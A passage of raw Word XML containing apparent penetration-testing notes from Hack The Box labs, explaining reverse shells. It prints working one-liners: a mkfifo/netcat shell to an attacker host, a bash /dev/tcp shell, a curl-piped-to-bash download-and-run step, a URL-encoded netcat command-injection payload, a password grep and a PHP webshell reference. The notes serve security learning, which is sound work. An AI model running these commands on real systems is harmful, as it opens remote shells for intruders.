      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm /tmp/f; mkfifo /tmp/f:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Removes any existing file named /tmp/f and creates a named pipe (FIFO) at /tmp/f.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A named pipe allows one process to write data and another to read it asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /tmp/f | /bin/sh -i 2&gt;&amp;1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads input from the pipe (/tmp/f) using cat, and pipes it into an interactive shell (/bin/sh -i).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The 2&gt;&amp;1 redirects the shell's standard error (descriptor 2) to standard output (descriptor 1), ensuring all output (stdout and stderr) goes through the same stream.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| nc &lt;attacker-ip&gt; &lt;attacker-port&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses Netcat (nc) to connect to the attacker's machine at the specified IP and port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Any input received from the attacker's connection is sent to the shell, and the shell's output is sent back to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; /tmp/f:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sends any output from the reverse shell back into the named pipe (/tmp/f), completing the loop.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tu46e05hhb5l" w:id="131"/>
      <w:bookmarkEnd w:id="131"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell via arbitrary code execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we are allowed to run arbitrary code (as shown in Codify HTB, where we were inside a JavaScript sandbox but we escaped and could run terminal code as the host), but it doesn't allow us to run a reverse shell directly, we can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">host a reverse shell via python,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then make the host (target)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl our reverse shell and then run it directly</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing us to get a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -e 'bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10/4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0&gt;&amp;1' &gt; rev.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 8081</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lnvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10:8081</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/rev.sh|bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to replace the IP with your IP, and then the port with your </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PYTHON </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port, not your reverse shell port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FAC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FAE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash reverse shell (used for command injection) (from Headless HTB):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 10.10.14.41 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+nc+10.10.14.41+4444+-e+/bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For URL encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lateral Movement:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use this to read many files at the same time for interesting stuff when we see many interesting file in the current directory we are in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat * | grep -i passw*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The -i flag in the grep command stands for "ignore case".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable functions include: eval(), include(), or exec()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One that can be found locally and worked was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/webshells/php/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /usr/share/webshells/php/php-reverse-shell.php ~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This copies the php-reverse-shell into home (~)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="721"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId324">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="721"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also do this to download it to a file:</w:t>
